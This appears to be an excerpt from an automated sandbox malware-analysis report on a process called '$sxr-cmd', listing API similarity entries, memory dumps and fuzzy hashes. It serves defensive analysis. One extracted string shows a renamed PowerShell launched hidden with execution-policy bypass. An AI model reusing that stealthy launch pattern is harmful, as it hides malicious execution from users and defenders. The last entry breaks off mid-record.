                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                      • String ID: FOR$ IF
                                                                                                                      • API String ID: 557945885-2924197646
                                                                                                                      • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                      • Instruction ID: 910eaedead6930c7bd8c2edd1f10ec605fd2b992b87bede32f48d75d85c56c0c
                                                                                                                      • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                      • Instruction Fuzzy Hash: EF517B28F09E4281EE59AF2A9454279A7A1AF85FB4B484236D91ED77F1DF3CEC018300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswdigit$iswspacewcschr
                                                                                                                      • String ID: )$=,;
                                                                                                                      • API String ID: 1959970872-2167043656
                                                                                                                      • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                      • Instruction ID: 8cb238b7fdf6f808f1cbe866fc196553dcf279ce3481f9a2638e602806178b48
                                                                                                                      • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                      • Instruction Fuzzy Hash: AB418066E08E5696FB648F1D9544379B6A0AF10F75F445032CD5CC25B4EF3CACA18B81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                      • String ID: %04X-%04X$:
                                                                                                                      • API String ID: 930873262-1938371929
                                                                                                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                      • Instruction ID: 38ccec4db8636c086c8e75451ce8fa03ec2a43fc4db8365d9636089a407114ea
                                                                                                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                      • Instruction Fuzzy Hash: EF415139A08E42C2EB249B64E4412BAE7A0FB84F74F418136D94DC26E6DF3CD945C710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction ID: 7f0b74bb45eec5059da990e160074d66303e6b8c8f52cc8ab941cf5802f062d8
                                                                                                                      • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction Fuzzy Hash: C1417133619B8097E764CFA2E44879AB7B2F389B94F408125DB8D0BB55EF39D164CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                      • API String ID: 3249344982-2616576482
                                                                                                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                      • Instruction ID: 25c29643cd10bd87944ff95a7902b9892a3f36112a78b5a939b306261901abfc
                                                                                                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                      • Instruction Fuzzy Hash: 3B416F76618F4186E7108F11A84437AFAA4FB89FE8F458235DA4D87BA5CF3CD9158B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$iswdigit
                                                                                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                      • API String ID: 2770779731-632268628
                                                                                                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                      • Instruction ID: a8881172c478a724567cf0ce1745b6803f311b699632773467858ef5f8745331
                                                                                                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                      • Instruction Fuzzy Hash: 34313E76A08E56C5E7509F11E450278BBE0FB49F69B698136DA4DC7764EF3CE804C710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: 4926955a7591a6564aaa11b3223f02b4951c6af9ffa7b7f8394ee2063b7cdf71
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: 0781F42161E34386FA50ABE79C4C35EABB3EB457A0F4444A5AA4D4BF97FB39C845C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: 75f5719f37d8fdb06d13ef41f00628fd018543a76fd951472ae878f9c677a3aa
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: A381D321A0FB418AFA549BE59849B7922B3A745BB0FD48425DA0D4F797FF3BCC418700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192234081-0
                                                                                                                      • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                      • Instruction ID: 0334856e89b555fc58403afa2cf52b7c88c7028b85f811103a3abaf02f578bfe
                                                                                                                      • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                      • Instruction Fuzzy Hash: BB317035608A41CBE714AF25A44467DFBA1FB89FA0F459234DE9A877A6CF3CD8018B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF615501673
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF61550168D
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF615501757
                                                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF61550176E
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF615501788
                                                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF61550179C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Alloc$Size
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3586862581-0
                                                                                                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                      • Instruction ID: ef4af5e63cd71ddbc16b8a5a216859c4fee081dc597503c0382926c8d2874c3f
                                                                                                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                      • Instruction Fuzzy Hash: 5591593AA09E4681EB549B19E850279B7A0FF44FA8F598136DA4EC37B0DF3CE941C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1313749407-0
                                                                                                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                      • Instruction ID: 85bc954d75da018bcd9305005a9935087306d8b7e2c5e27ed7e06886d7f6ed1e
                                                                                                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                      • Instruction Fuzzy Hash: D451E52AA08E8282FA149F2598146B9E691BF49FB8F484135DD1ED73F5EF3CEC418700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 920682188-0
                                                                                                                      • Opcode ID: be4b77dfe7ad7769add329515d440734d7951c7df2e85f8d66a750b62f7777ce
                                                                                                                      • Instruction ID: d97248fbef8d504284c1c69bebd6fb39b439c221fd4cbe11c58ea220f0e03d94
                                                                                                                      • Opcode Fuzzy Hash: be4b77dfe7ad7769add329515d440734d7951c7df2e85f8d66a750b62f7777ce
                                                                                                                      • Instruction Fuzzy Hash: FE51383A705B818AEB25DF20D8542E8B7A1FB88F98F058139CA4D87764EF3CDA55C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX, xrefs: 00007FF6154FE00B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess_setjmp
                                                                                                                      • String ID: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX
                                                                                                                      • API String ID: 777023205-2484198049
                                                                                                                      • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                      • Instruction ID: f632c45d47c45012cc09f57fd8fdcc40d13c03fb329e13bd4fed60805d4662e7
                                                                                                                      • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                      • Instruction Fuzzy Hash: 9251193990DE528AEA90CF19A880178F7A0BF49F79F555536D94EC26B5EF3CAC60C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswdigit$iswspacewcschr
                                                                                                                      • String ID: )$=,;
                                                                                                                      • API String ID: 1959970872-2167043656
                                                                                                                      • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                      • Instruction ID: 745025a102bbdd78b00492d41132b255e2f846995157a0dd2a464cfd47f0cba7
                                                                                                                      • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                      • Instruction Fuzzy Hash: 11418E69E08E17A7FBA48B2C9544279F6A0AF10F74F445033C95DC25B4EF3CAC618B80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                      • API String ID: 3625580822-2781220306
                                                                                                                      • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                      • Instruction ID: d7d1a7e60d856ba20983ea8adc5d7b1e7c465e429e045829185369bb7cf4f98a
                                                                                                                      • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                      • Instruction Fuzzy Hash: 1131D429A08E4692EA149F92A5401BAFAB0BF45FB4F444135CD2E9B7B5EF3CEC55C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                      • String ID: api-ms-
                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                      • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                                      • Instruction ID: ac16e51702db152b7354d9f0af860c22bf308e468b7951b7b5f77b4c33d962d8
                                                                                                                      • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                                      • Instruction Fuzzy Hash: 5E31B03161BF4091FE15DB86A80979963B6BB88BB4F990535EE2D4E3C6FF3AC0448300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                      • String ID: CONOUT$
                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                      • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                                      • Instruction ID: 023d4b828e78e936407d9e365cab6ceb2d800f2a5129076495838d2d11724087
